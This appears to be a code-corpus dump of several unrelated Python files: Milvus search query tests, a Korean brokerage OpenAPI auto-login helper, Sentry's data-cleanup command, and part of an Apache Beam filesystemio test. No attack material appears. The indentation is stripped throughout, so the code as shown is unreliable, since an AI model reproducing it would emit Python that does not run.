gen_default_term_expr(values=[1 for i in range(1, default_nb)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_value_empty(self, connect, collection):
'''
method: build query with term value empty
expected: return null
'''
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_complex_dsl(self, connect, collection):
'''
method: query with complicated dsl
expected: no error raised
'''
expr = {"must": [
{"must": [{"should": [gen_default_term_expr(values=[1]), gen_default_range_expr()]}]},
{"must": [gen_default_vector_expr(default_query)]}
]}
logging.getLogger().info(expr)
query = update_query_expr(default_query, expr=expr)
logging.getLogger().info(query)
connect.load_collection(collection)
res = connect.search(collection, query)
logging.getLogger().info(res)
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_key_error(self, connect, collection):
'''
method: build query with term key error
expected: Exception raised
'''
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(keyword="terrm", values=[i for i in range(default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_term()
)
def get_invalid_term(self, request):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
'''
method: build query with wrong format term
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
term = get_invalid_term
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_field_named_term(self, connect, collection):
'''
method: build query with field named "term"
expected: error raised
'''
term_fields = add_field_default(default_fields, field_name="term")
collection_term = gen_unique_str("term")
connect.create_collection(collection_term, term_fields)
term_entities = add_field(entities, field_name="term")
ids = connect.insert(collection_term, term_entities)
assert len(ids) == default_nb
connect.flush([collection_term])
# count = connect.count_entities(collection_term)
# assert count == default_nb
stats = connect.get_collection_stats(collection_term)
assert stats["row_count"] == default_nb
term_param = {"term": {"term": {"values": [i for i in range(default_nb // 2)]}}}
expr = {"must": [gen_default_vector_expr(default_query),
term_param]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection_term)
res = connect.search(collection_term, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
connect.drop_collection(collection_term)
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields term, one of it not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
term["term"].update({"a": [0]})
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid range query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_range()
)
def get_invalid_range(self, request):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: raise Exception
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: 0
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": default_nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == 0
@pytest.fixture(
scope="function",
params=gen_valid_ranges()
)
def get_valid_ranges(self, request):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields ranges, one of fields not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": default_nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_term_has_common(self, connect, collection):
'''
method: build query with multi term with same field, and values has common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 3)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_term_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_term_different_fields(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(field="float",
values=[float(i) for i in range(default_nb // 2, default_nb)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_term_multi_fields(self, connect, collection):
'''
method: build query with multi term, different field each term
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = {"int64": {"values": [i for i in range(default_nb // 2)]}}
term_second = {"float": {"values": [float(i) for i in range(default_nb // 2, default_nb)]}}
term = update_term_expr({"term": {}}, [term_first, term_second])
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_range_has_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges has common
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": 1, "LT": default_nb // 3})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_range_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_range_different_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = gen_default_range_expr()
range_second = gen_default_range_expr(field="float", ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_first, range_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_range_multi_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = {"int64": {"GT": 0, "LT": default_nb // 2}}
range_second = {"float": {"GT": default_nb / 2, "LT": float(default_nb)}}
range = update_range_expr({"range": {}}, [range_first, range_second])
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_term_range_has_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": -1, "LT": default_nb // 2})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_query_single_term_range_no_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_multi_vectors_same_field(self, connect, collection):
'''
method: build query with two vectors same field
expected: error raised
'''
entities, ids = init_data(connect, collection)
vector1 = default_query
vector2 = gen_query_vectors(field_name, entities, default_top_k, nq=2)
expr = {
"must": [vector1, vector2]
}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchDSLBools(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_no_bool(self, connect, collection):
'''
method: build query without bool expr
expected: error raised
'''
entities, ids = init_data(connect, collection)
expr = {"bool1": {}}
query = expr
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_term(self, connect, collection):
'''
method: build query without must, with should.term instead
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_vector(self, connect, collection):
'''
method: build query without must, with should.vector instead
expected: error raised
'''
expr = {"should": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_must_not_only_term(self, connect, collection):
'''
method: build query without must, with must_not.term instead
expected: error raised
'''
expr = {"must_not": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_must_not_vector(self, connect, collection):
'''
method: build query without must, with must_not.vector instead
expected: error raised
'''
expr = {"must_not": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_query_must_should(self, connect, collection):
'''
method: build query must, and with should.term
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=True, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
class TestSearchInvalid(object):
"""
Test search collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_partition(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_invalid_collection(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_invalid_partition(self, connect, collection, get_invalid_partition):
# tag = " "
tag = get_invalid_partition
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, partition_names=tag)
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
fields = [get_invalid_field]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_not_existed_field(self, connect, collection):
fields = [gen_unique_str("field_name")]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
"""
Test search collection with invalid query
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_top_k(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
'''
target: test search function, with the wrong top_k
method: search with top_k
expected: raise an error, and the connection is normal
'''
top_k = get_top_k
default_query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query)
"""
Test search collection with invalid search params
"""
@pytest.fixture(
scope="function",
params=gen_invaild_search_params()
)
def get_search_params(self, request):
yield request.param
# 1463
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
'''
target: test search function, with the wrong nprobe
method: search with nprobe
expected: raise an error, and the connection is normal
'''
search_params = get_search_params
index_type = get_simple_index["index_type"]
if index_type in ["FLAT"]:
# pytest.skip("skip in FLAT index")
pass
if index_type != search_params["index_type"]:
# pytest.skip("skip if index_type not matched")
pass
entities, ids = init_data(connect, collection, nb=1200)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1,
search_params=search_params["search_params"])
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_invalid_params_binary(self, connect, binary_collection):
'''
target: test search function, with the wrong nprobe
method: search with nprobe
expected: raise an error, and the connection is normal
'''
nq = 1
index_type = "BIN_IVF_FLAT"
int_vectors, entities, ids = init_binary_data(connect, binary_collection)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
connect.create_index(binary_collection, binary_field_name,
{"index_type": index_type, "metric_type": "JACCARD", "params": {"nlist": 128}})
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
search_params={"nprobe": 0}, metric_type="JACCARD")
with pytest.raises(Exception) as e:
res = connect.search(binary_collection, query)
# #1464
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
'''
target: test search function, with empty search params
method: search with params
expected: raise an error, and the connection is normal
'''
index_type = get_simple_index["index_type"]
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
if index_type == "FLAT":
# pytest.skip("skip in FLAT index")
pass
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1, search_params={})
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_empty_vectors(self, connect, collection):
"""
target: test search function, with empty search vectors
method: search
expected: raise an exception
"""
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq=0)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchWithExpression(object):
@pytest.fixture(
scope="function",
params=[1, 10, 20],
)
def limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_normal_expressions(),
)
def expression(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[
{"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}},
]
)
def index_param(self, request):
return request.param
@pytest.fixture(
scope="function",
)
def search_params(self):
return {"metric_type": "L2", "params": {"nprobe": 10}}
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_expression(self, connect, collection, index_param, search_params, limit, expression):
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.create_index(collection, default_float_vec_field_name, index_param)
connect.load_collection(collection)
nq = 10
query_data = entities[2]["values"][:nq]
res = connect.search_with_expression(collection, query_data, default_float_vec_field_name, search_params,
limit, expression)
assert len(res) == nq
for topk_results in res:
assert len(topk_results) <= limit
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
|
autologin2.py | import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import openapi_path
class Window(QtWidgets.QMainWindow):
app = QtWidgets.QApplication(sys.argv)
def __init__(self):
super().__init__()
self.bool_connected = False
self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
self.ocx.OnEventConnect.connect(self.OnEventConnect)
self.CommConnect()
def CommConnect(self):
self.ocx.dynamicCall('CommConnect()')
while not self.bool_connected:
pythoncom.PumpWaitingMessages()
def OnEventConnect(self, err_code):
if err_code == 0:
self.bool_connected = True
self.AutoLoginOn()
def AutoLoginOn(self):
print('\n 자동 로그인 설정 대기 중 ...\n')
QTimer.singleShot(5000, lambda: auto_on(2))
self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
print(' 자동 로그인 설정 완료\n')
print(' 자동 로그인 설정용 프로세스 종료 중 ...')
if __name__ == '__main__':
login_info = f'{openapi_path}/system/Autologin.dat'
if os.path.isfile(login_info):
os.remove(f'{openapi_path}/system/Autologin.dat')
print('\n 자동 로그인 설정 파일 삭제 완료\n')
Process(target=Window).start()
print(' 자동 로그인 설정용 프로세스 시작\n')
while find_window('Open API login') == 0:
print(' 로그인창 열림 대기 중 ...\n')
time.sleep(1)
print(' 아이디 및 패스워드 입력 대기 중 ...\n')
time.sleep(5)
manual_login(4)
print(' 아이디 및 패스워드 입력 완료\n')
|
cleanup.py | """
sentry.runner.commands.cleanup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import os
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
from sentry.models import Project
try:
if value.isdigit():
return int(value)
if '/' not in value:
return None
org, proj = value.split('/', 1)
return Project.objects.get_from_cache(
organization__slug=org,
slug=proj,
).id
except Project.DoesNotExist:
return None
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
API_TOKEN_TTL_IN_DAYS = 30
def multiprocess_worker(task_queue):
# Configure within each Process
import logging
from sentry.utils.imports import import_string
logger = logging.getLogger('sentry.cleanup')
configured = False
while True:
j = task_queue.get()
if j == _STOP_WORKER:
task_queue.task_done()
return
# On first task, configure Sentry environment
if not configured:
from sentry.runner import configure
configure()
from sentry import models
from sentry import deletions
from sentry import similarity
skip_models = [
# Handled by other parts of cleanup
models.Event,
models.EventMapping,
models.EventAttachment,
models.UserReport,
models.Group,
models.GroupEmailThread,
models.GroupRuleStatus,
# Handled by TTL
similarity.features,
] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
configured = True
model, chunk = j
model = import_string(model)
try:
task = deletions.get(
model=model,
query={'id__in': chunk},
skip_models=skip_models,
transaction_id=uuid4().hex,
)
while True:
if not task.chunk():
break
except Exception as e:
logger.exception(e)
finally:
task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
'--concurrency',
type=int,
default=1,
show_default=True,
help='The total number of concurrent worker processes to run.'
)
@click.option(
'--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
'--timed',
'-t',
default=False,
is_flag=True,
help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
"""Delete a portion of trailing data based on creation date.
All data that is older than `--days` will be deleted. The default for
this is 30 days. In the default setting all projects will be truncated
but if you have a specific project you want to limit this to this can be
done with the `--project` flag which accepts a project ID or a string
with the form `org/project` where both are slugs.
"""
if concurrency < 1:
click.echo('Error: Minimum concurrency is 1', err=True)
raise click.Abort()
os.environ['_SENTRY_CLEANUP'] = '1'
# Make sure we fork off multiprocessing pool
# before we import or configure the app
from multiprocessing import Process, JoinableQueue as Queue
pool = []
task_queue = Queue(1000)
for _ in xrange(concurrency):
p = Process(target=multiprocess_worker, args=(task_queue,))
p.daemon = True
p.start()
pool.append(p)
from sentry.runner import configure
configure()
from django.db import router as db_router
from sentry.app import nodestore
from sentry.db.deletion import BulkDeleteQuery
from sentry import models
if timed:
import time
from sentry.utils import metrics
start_time = time.time()
# list of models which this query is restricted to
model_list = {m.lower() for m in model}
def is_filtered(model):
if router is not None and db_router.db_for_write(model) != router:
return True
if not model_list:
return False
return model.__name__.lower() not in model_list
# Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
# (model, datetime_field, order_by)
BULK_QUERY_DELETES = [
(models.EventMapping, 'date_added', '-date_added'),
(models.EventAttachment, 'date_added', None),
(models.UserReport, 'date_added', None),
(models.GroupEmailThread, 'date', None),
(models.GroupRuleStatus, 'date_added', None),
] + EXTRA_BULK_QUERY_DELETES
# Deletions that use the `deletions` code path (which handles their child relations)
# (model, datetime_field, order_by)
DELETES = (
(models.Event, 'datetime', 'datetime'),
(models.Group, 'last_seen', 'last_seen'),
)
if not silent:
click.echo('Removing expired values for LostPasswordHash')
if is_filtered(models.LostPasswordHash):
if not silent:
click.echo('>> Skipping LostPasswordHash')
else:
models.LostPasswordHash.objects.filter(
date_added__lte=timezone.now() - timedelta(hours=48)
).delete()
if is_filtered(models.OrganizationMember) and not silent:
click.echo('>> Skipping OrganizationMember')
else:
if not silent:
click.echo('Removing expired values for OrganizationMember')
expired_threshold = timezone.now() - timedelta(days=days)
models.OrganizationMember.delete_expired(expired_threshold)
for model in [models.ApiGrant, models.ApiToken]:
if not silent:
click.echo(u'Removing expired values for {}'.format(model.__name__))
if is_filtered(model):
if not silent:
click.echo(u'>> Skipping {}'.format(model.__name__))
else:
queryset = model.objects.filter(
expires_at__lt=(timezone.now() - timedelta(days=API_TOKEN_TTL_IN_DAYS)),
)
# SentryAppInstallations are associated to ApiTokens. We're okay
# with these tokens sticking around so that the Integration can
# refresh them, but all other non-associated tokens should be
# deleted.
if model is models.ApiToken:
queryset = queryset.filter(sentry_app_installation__isnull=True)
queryset.delete()
project_id = None
if project:
click.echo(
"Bulk NodeStore deletion not available for project selection", err=True)
project_id = get_project(project)
if project_id is None:
click.echo('Error: Project not found', err=True)
raise click.Abort()
else:
if not silent:
click.echo("Removing old NodeStore values")
cutoff = timezone.now() - timedelta(days=days)
try:
nodestore.cleanup(cutoff)
except NotImplementedError:
click.echo(
"NodeStore backend does not support cleanup operation", err=True)
for bqd in BULK_QUERY_DELETES:
if len(bqd) == 4:
model, dtfield, order_by, chunk_size = bqd
else:
chunk_size = 10000
model, dtfield, order_by = bqd
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
).execute(chunk_size=chunk_size)
for model, dtfield, order_by in DELETES:
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
imp = '.'.join((model.__module__, model.__name__))
q = BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
)
for chunk in q.iterator(chunk_size=100):
task_queue.put((imp, chunk))
task_queue.join()
# Clean up FileBlob instances which are no longer used and aren't super
# recent (as there could be a race between blob creation and reference)
if not silent:
click.echo("Cleaning up unused FileBlob references")
if is_filtered(models.FileBlob):
if not silent:
click.echo('>> Skipping FileBlob')
else:
cleanup_unused_files(silent)
# Shut down our pool
for _ in pool:
task_queue.put(_STOP_WORKER)
# And wait for it to drain
for p in pool:
p.join()
if timed:
duration = int(time.time() - start_time)
metrics.timing('cleanup.duration', duration, instance=router, sample_rate=1.0)
click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
"""
Remove FileBlob's (and thus the actual files) if they are no longer
referenced by any File.
We set a minimum-age on the query to ensure that we don't try to remove
any blobs which are brand new and potentially in the process of being
referenced.
"""
from sentry.models import File, FileBlob, FileBlobIndex
if quiet:
from sentry.utils.query import RangeQuerySetWrapper
else:
from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper
cutoff = timezone.now() - timedelta(days=1)
queryset = FileBlob.objects.filter(
timestamp__lte=cutoff,
)
for blob in RangeQuerySetWrapper(queryset):
if FileBlobIndex.objects.filter(blob=blob).exists():
continue
if File.objects.filter(blob=blob).exists():
continue
blob.delete()
|
filesystemio_test.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for filesystemio."""
from __future__ import absolute_import
import io
import logging
import multiprocessing
import os
import threading
import unittest
from builtins import range
from apache_beam.io import filesystemio
class FakeDownloader(filesystemio.Downloader):
def __init__(self, data):
self._data = data
self.last_read_size = -1
@property
def size(self):
return len(self._data)
def get_range(self, start, end):
self.last_read_size = end - start
return self._data[start:end]
class FakeUploader(filesystemio.Uploader):
def __init__(self):
self.data = ''
self.last_write_size = -1
self.finished = False
def last_error(self):
return None
def put(self, data):
assert not self.finished
self.data += data.tobytes()
self.last_write_size = len(data)
def finish(self):
self.finished = True
class TestDownloaderStream(unittest.TestCase):
def test_file_attributes(self):
downloader = FakeDownloader(data=None)
stream = filesystemio.DownloaderStream(downloader)
self.assertEqual(stream.mode, 'r')
self.assertTrue(stream.readable())
self.assertFalse(stream.writable())
self.assertTrue(stream.seekable())
def test_read_empty(self):
downloader = FakeDownloader(data='')
stream = filesystemio.DownloaderStream(downloader)
self.assertEqual(stream.read(), '')
def test_read(self):
data = 'abcde'
downloader = FakeDownloader(data)
stream = filesystemio.DownloaderStream(downloader)
# Read size is exactly what was passed to read() (unbuffered).
self.assertEqual(stream.read(1), data[0])
self.assertEqual(downloader.last_read_size, 1)
self.assertEqual(stream.read(), data[1:])
self.assertEqual(downloader.last_read_size, len(data) - 1)
def test_read_buffered(self):
data = 'abcde'
downloader = FakeDownloader(data)
buffer_size = 2
